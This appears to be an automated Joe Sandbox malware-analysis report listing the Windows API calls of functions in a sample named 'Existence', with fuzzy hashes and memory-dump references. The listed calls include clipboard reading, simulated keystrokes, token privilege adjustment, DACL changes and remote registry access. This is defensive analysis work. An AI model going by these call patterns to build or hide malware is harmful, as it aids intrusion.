• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: IconNotifyShell_
• String ID:
• API String ID: 1144537725-0
• Opcode ID: ba6aaf99f5894403925dc1f1da6689517ef7e5de06104fd21afa59b6c04a4bed
• Instruction ID: 1a845136d516c6252da939a3abce53131b63d1bce305b1a3aaf3bef3f9c4cbd9
• Opcode Fuzzy Hash: ba6aaf99f5894403925dc1f1da6689517ef7e5de06104fd21afa59b6c04a4bed
• Instruction Fuzzy Hash: E0F037709143549FE7A29F24DC4D7D57BBCB70170CF0040A9A64496292D7B85B88CF51
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00733A76
  • Part of subcall function 00738577: _wcslen.LIBCMT ref: 0073858A
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: LongNamePath_wcslen
• String ID:
• API String ID: 541455249-0
• Opcode ID: 0fd152e9fd26eb680dc0a9d4afad68ec858825d95995c351d83b33ea842b37b1
• Instruction ID: cf789caaee97c669f9e40e2d79421eac1c9bee690f7bb9d304f3c2b49d57712d
• Opcode Fuzzy Hash: 0fd152e9fd26eb680dc0a9d4afad68ec858825d95995c351d83b33ea842b37b1
• Instruction Fuzzy Hash: FFE0CD7290022457CB2092589C09FDA77DDEFC8790F054075FC09D7255D974ED808690
Uniqueness
• Uniqueness Score: -1.00%

APIs
• CreateFileW.KERNEL32(00000000,00000000,?,00770A84,?,?,00000000,?,00770A84,00000000,0000000C), ref: 00770737
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 977afb5854ce02e10fc344a0b256e63f3f832ffae5d104df1950d2f07b78bd4c
• Instruction ID: b08dfc2ac624767ee29131c7c6f1bafc581686d96041c7068e0b502d3e410f66
• Opcode Fuzzy Hash: 977afb5854ce02e10fc344a0b256e63f3f832ffae5d104df1950d2f07b78bd4c
• Instruction Fuzzy Hash: A6D06C3200010DBBDF128F85DD06EDA3BAAFB48714F018010BE1856020C736E821AB94
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetFileAttributesW.KERNEL32(?,0079D840), ref: 0079EAB1
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: AttributesFile
• String ID:
• API String ID: 3188754299-0
• Opcode ID: bff8dd02def216e620249897928006a6bd3128e4217e4c22ab8ed71d583ffef3
• Instruction ID: 8df3f93695f4a063589435b8d97b55c3d2c9ae64c7ae248f37dcef510d2a6954
• Opcode Fuzzy Hash: bff8dd02def216e620249897928006a6bd3128e4217e4c22ab8ed71d583ffef3
• Instruction Fuzzy Hash: AFB0923400060005AD284A386A0A9A93300B8423A5BDC9BC4E479852F2C33D9C8FA950
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 0079DC54: FindFirstFileW.KERNEL32(?,?), ref: 0079DCCB
  • Part of subcall function 0079DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 0079DD1B
  • Part of subcall function 0079DC54: FindNextFileW.KERNEL32(00000000,00000010), ref: 0079DD2C
  • Part of subcall function 0079DC54: FindClose.KERNEL32(00000000), ref: 0079DD43
• GetLastError.KERNEL32 ref: 007A666E
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2191629493-0
                                                                                                                                                                                          • Opcode ID: 2b9e7d7cf90ed00ee2fa2e5dee12c7fdf6a2ca40699c673bc77d2ad369e192f9
                                                                                                                                                                                          • Instruction ID: 002caa5fc0319c14316655f34f82c04217d73f9b5030f47caca4b2be66fdc892
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b9e7d7cf90ed00ee2fa2e5dee12c7fdf6a2ca40699c673bc77d2ad369e192f9
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2CF0A076204600DFDB24EF58D849F6EB7E5AF88320F048459F9498B352CB78BC01CB95
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetForegroundWindow.USER32(00000000,00000000,00000000), ref: 0074FC86
                                                                                                                                                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0078FCB8
                                                                                                                                                                                          • IsIconic.USER32(00000000), ref: 0078FCC1
                                                                                                                                                                                          • ShowWindow.USER32(00000000,00000009), ref: 0078FCCE
                                                                                                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0078FCD8
                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0078FCEE
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0078FCF5
                                                                                                                                                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0078FD01
                                                                                                                                                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0078FD12
                                                                                                                                                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0078FD1A
                                                                                                                                                                                          • AttachThreadInput.USER32(00000000,000000FF,00000001), ref: 0078FD22
                                                                                                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0078FD25
                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078FD3A
                                                                                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0078FD45
                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078FD4F
                                                                                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0078FD54
                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078FD5D
                                                                                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0078FD62
                                                                                                                                                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0078FD6C
                                                                                                                                                                                          • keybd_event.USER32(00000012,00000000), ref: 0078FD71
                                                                                                                                                                                          • SetForegroundWindow.USER32(00000000), ref: 0078FD74
                                                                                                                                                                                          • AttachThreadInput.USER32(?,000000FF,00000000), ref: 0078FD9B
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                                                                                                                                                          • String ID: Shell_TrayWnd
                                                                                                                                                                                          • API String ID: 4125248594-2988720461
                                                                                                                                                                                          • Opcode ID: ec43d8851965e9978f573dba08c1bfee9051564bd4a314ba6c0514984af57274
                                                                                                                                                                                          • Instruction ID: 12c0c6645bd94f365a66466264bdb869b896574ebd0681065851dea68582d49d
                                                                                                                                                                                          • Opcode Fuzzy Hash: ec43d8851965e9978f573dba08c1bfee9051564bd4a314ba6c0514984af57274
                                                                                                                                                                                          • Instruction Fuzzy Hash: 25315071B80218BBEB306BA55C4AFBE7F6CEB44B50F114079FA01E61D1D6B85D10ABB4
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00792010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0079205A
                                                                                                                                                                                            • Part of subcall function 00792010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00792087
                                                                                                                                                                                            • Part of subcall function 00792010: GetLastError.KERNEL32 ref: 00792097
                                                                                                                                                                                          • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00791BD2
                                                                                                                                                                                          • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00791BF4
                                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00791C05
                                                                                                                                                                                          • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00791C1D
                                                                                                                                                                                          • GetProcessWindowStation.USER32 ref: 00791C36
                                                                                                                                                                                          • SetProcessWindowStation.USER32(00000000), ref: 00791C40
                                                                                                                                                                                          • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00791C5C
                                                                                                                                                                                            • Part of subcall function 00791A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00791B48), ref: 00791A20
                                                                                                                                                                                            • Part of subcall function 00791A0B: CloseHandle.KERNEL32(?,?,00791B48), ref: 00791A35
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          • Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_10_2_730000_Existence.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                          • String ID: $default$winsta0
                                                                                                                                                                                          • API String ID: 22674027-1027155976
                                                                                                                                                                                          • Opcode ID: 0e3c4f4e5cbc5675326df1de52428536e9a2034af52bdde9d89a804dce2e88fa
                                                                                                                                                                                          • Instruction ID: 29a4da4732408f84930c48055ed94752f6c0f11eef052bce1c5ea0c59eb0418e
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0e3c4f4e5cbc5675326df1de52428536e9a2034af52bdde9d89a804dce2e88fa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 60816F71A0120AAFDF219FA4EC49FEE7BB8EF04304F548029F915A61A0D7798D65CB64
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00791A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00791A60
                                                                                                                                                                                            • Part of subcall function 00791A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,007914E7,?,?,?), ref: 00791A6C
                                                                                                                                                                                            • Part of subcall function 00791A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,007914E7,?,?,?), ref: 00791A7B
                                                                                                                                                                                            • Part of subcall function 00791A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,007914E7,?,?,?), ref: 00791A82
                                                                                                                                                                                            • Part of subcall function 00791A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00791A99
                                                                                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00791518
                                                                                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0079154C
                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 00791563
                                                                                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 0079159D
                                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007915B9
                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 007915D0
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 007915D8
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 007915DF
                                                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00791600
                                                                                                                                                                                          • CopySid.ADVAPI32(00000000), ref: 00791607
                                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00791636
                                                                                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00791658
                                                                                                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0079166A
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00791691
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 00791698
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007916A1
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 007916A8
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 007916B1
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 007916B8
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 007916C4
                                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 007916CB
                                                                                                                                                                                            • Part of subcall function 00791ADF: GetProcessHeap.KERNEL32(00000008,007914FD,?,00000000,?,007914FD,?), ref: 00791AED
  • Part of subcall function 00791ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,007914FD,?), ref: 00791AF4
  • Part of subcall function 00791ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,007914FD,?), ref: 00791B03
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
• String ID:
• API String ID: 4175595110-0
• Opcode ID: 614d3cf670a1df834277f784e6d46ce9bc148c2e49c195c18f11ae575cd3d8a4
• Instruction ID: 315ed270bb76591aaa487b238c9bef76ebc3513fbfaaab18f79807339471d9e0
• Opcode Fuzzy Hash: 614d3cf670a1df834277f784e6d46ce9bc148c2e49c195c18f11ae575cd3d8a4
• Instruction Fuzzy Hash: 14715F7190020AABDF10DFA5EC48FAEBBB8BF04340F498529E915A7290DB399D15CB64
Uniqueness
• Uniqueness Score: -1.00%

APIs
• OpenClipboard.USER32(007CDCD0), ref: 007AF586
• IsClipboardFormatAvailable.USER32(0000000D), ref: 007AF594
• GetClipboardData.USER32(0000000D), ref: 007AF5A0
• CloseClipboard.USER32 ref: 007AF5AC
• GlobalLock.KERNEL32(00000000), ref: 007AF5E4
• CloseClipboard.USER32 ref: 007AF5EE
• GlobalUnlock.KERNEL32(00000000,00000000), ref: 007AF619
• IsClipboardFormatAvailable.USER32(00000001), ref: 007AF626
• GetClipboardData.USER32(00000001), ref: 007AF62E
• GlobalLock.KERNEL32(00000000), ref: 007AF63F
• GlobalUnlock.KERNEL32(00000000,?), ref: 007AF67F
• IsClipboardFormatAvailable.USER32(0000000F), ref: 007AF695
• GetClipboardData.USER32(0000000F), ref: 007AF6A1
• GlobalLock.KERNEL32(00000000), ref: 007AF6B2
• DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 007AF6D4
• DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 007AF6F1
• DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 007AF72F
• GlobalUnlock.KERNEL32(00000000,?,?), ref: 007AF750
• CountClipboardFormats.USER32 ref: 007AF771
• CloseClipboard.USER32 ref: 007AF7B6
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
• String ID:
• API String ID: 420908878-0
• Opcode ID: 8e2e3146e69288c43dfbd4ae449edf2b6c309d848b8b04482f82241c5029e504
• Instruction ID: a54e63695540a007adeb7801d49148dcbc06c70c5cd5446b21172cd22def68c0
• Opcode Fuzzy Hash: 8e2e3146e69288c43dfbd4ae449edf2b6c309d848b8b04482f82241c5029e504
• Instruction Fuzzy Hash: CE61E031204301AFD310EF60D899F6ABBA4EF85744F54866DF846872A2DB39ED45CB62
Uniqueness
• Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(?,?), ref: 007A7403
• FindClose.KERNEL32(00000000), ref: 007A7457
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007A7493
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007A74BA
  • Part of subcall function 0073B329: _wcslen.LIBCMT ref: 0073B333
• FileTimeToSystemTime.KERNEL32(?,?), ref: 007A74F7
• FileTimeToSystemTime.KERNEL32(?,?), ref: 007A7524
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
• String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
• API String ID: 3830820486-3289030164
• Opcode ID: b861af17e4b14eb9ec9e24977ce1c5c3dea93e39761fc34bba9712f0e705b377
• Instruction ID: 8564b671c93e7aa8c4e1b39e310de265f3ad36d8d65c462f856edc1353d5294b
• Opcode Fuzzy Hash: b861af17e4b14eb9ec9e24977ce1c5c3dea93e39761fc34bba9712f0e705b377
• Instruction Fuzzy Hash: BDD16FB2508344EED314EB64CC85EBBB7ECAF88704F40491DF585D6292EB78DA44CB62
Uniqueness
• Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007AA0A8
• GetFileAttributesW.KERNEL32(?), ref: 007AA0E6
• SetFileAttributesW.KERNEL32(?,?), ref: 007AA100
• FindNextFileW.KERNEL32(00000000,?), ref: 007AA118
• FindClose.KERNEL32(00000000), ref: 007AA123
• FindFirstFileW.KERNEL32(*.*,?), ref: 007AA13F
• SetCurrentDirectoryW.KERNEL32(?), ref: 007AA18F
• SetCurrentDirectoryW.KERNEL32(007F7B94), ref: 007AA1AD
• FindNextFileW.KERNEL32(00000000,00000010), ref: 007AA1B7
• FindClose.KERNEL32(00000000), ref: 007AA1C4
• FindClose.KERNEL32(00000000), ref: 007AA1D4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
• String ID: *.*
• API String ID: 1409584000-438819550
• Opcode ID: 7fbfd6c0f7e176e052acf186fa3cd4ce61e14b5c06c6044b6e8f7702f3cd9ed9
• Instruction ID: 0894b945b1cc69528892ceefdd212ec2b01fbf136c09f2c0c0db7822b96e2a7c
• Opcode Fuzzy Hash: 7fbfd6c0f7e176e052acf186fa3cd4ce61e14b5c06c6044b6e8f7702f3cd9ed9
• Instruction Fuzzy Hash: 1B31E37150120DBBDB20AFA4DC49EDE73BCAF86321F0042A9E815D2190EB7CDE84CB65
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007A4785
• _wcslen.LIBCMT ref: 007A47B2
• CreateDirectoryW.KERNEL32(?,00000000), ref: 007A47E2
• CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007A4803
• RemoveDirectoryW.KERNEL32(?), ref: 007A4813
• DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007A489A
• CloseHandle.KERNEL32(00000000), ref: 007A48A5
• CloseHandle.KERNEL32(00000000), ref: 007A48B0
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
• String ID: :$\$\??\%s
• API String ID: 1149970189-3457252023
• Opcode ID: 183a51efdf2cc8f7feda268be1e25f93fffbf6b7c41f92470ff272bf68c2b435
• Instruction ID: a505cb8a503192d67a571744ca7d2544a1ffd270a70794d7b57458ad296c84c0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 183a51efdf2cc8f7feda268be1e25f93fffbf6b7c41f92470ff272bf68c2b435
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4031B4B1500149ABDB219FA0DC49FEB37BCFFCA741F1081BAF509D2060E7B89A458B24
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

APIs
• FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007AA203
• FindNextFileW.KERNEL32(00000000,?), ref: 007AA25E
• FindClose.KERNEL32(00000000), ref: 007AA269
• FindFirstFileW.KERNEL32(*.*,?), ref: 007AA285
• SetCurrentDirectoryW.KERNEL32(?), ref: 007AA2D5
• SetCurrentDirectoryW.KERNEL32(007F7B94), ref: 007AA2F3
• FindNextFileW.KERNEL32(00000000,00000010), ref: 007AA2FD
• FindClose.KERNEL32(00000000), ref: 007AA30A
• FindClose.KERNEL32(00000000), ref: 007AA31A
  • Part of subcall function 0079E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0079E3B4
Strings
Memory Dump Source
• Source File: 0000000A.00000002.2228440113.0000000000731000.00000020.00000001.01000000.00000005.sdmp, Offset: 00730000, based on PE: true
• Associated: 0000000A.00000002.2228423540.0000000000730000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007CD000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228490080.00000000007F3000.00000002.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228532224.00000000007FD000.00000004.00000001.01000000.00000005.sdmp
• Associated: 0000000A.00000002.2228548084.0000000000805000.00000002.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_10_2_730000_Existence.jbxd
Similarity
• API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
• String ID: *.*
• API String ID: 2640511053-438819550
• Opcode ID: 786f23319af0db5fb430c87744f29709ea3af7b5aea7e08fa8aab0e83bd50998
• Instruction ID: 58330d9d813c7ffad94701756234930c2adf03139dad3fcfba0624fd909650af
• Opcode Fuzzy Hash: 786f23319af0db5fb430c87744f29709ea3af7b5aea7e08fa8aab0e83bd50998
• Instruction Fuzzy Hash: 4631C77150021DBECF20AFA4DC49EDE77ADAF86324F1042A9E810A21D0DB7DDE95CB55
Uniqueness
• Uniqueness Score: -1.00%

APIs
  • Part of subcall function 007BD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007BC10E,?,?), ref: 007BD415
  • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD451
  • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD4C8
  • Part of subcall function 007BD3F8: _wcslen.LIBCMT ref: 007BD4FE
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007BC99E
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 007BCA09
• RegCloseKey.ADVAPI32(00000000), ref: 007BCA2D
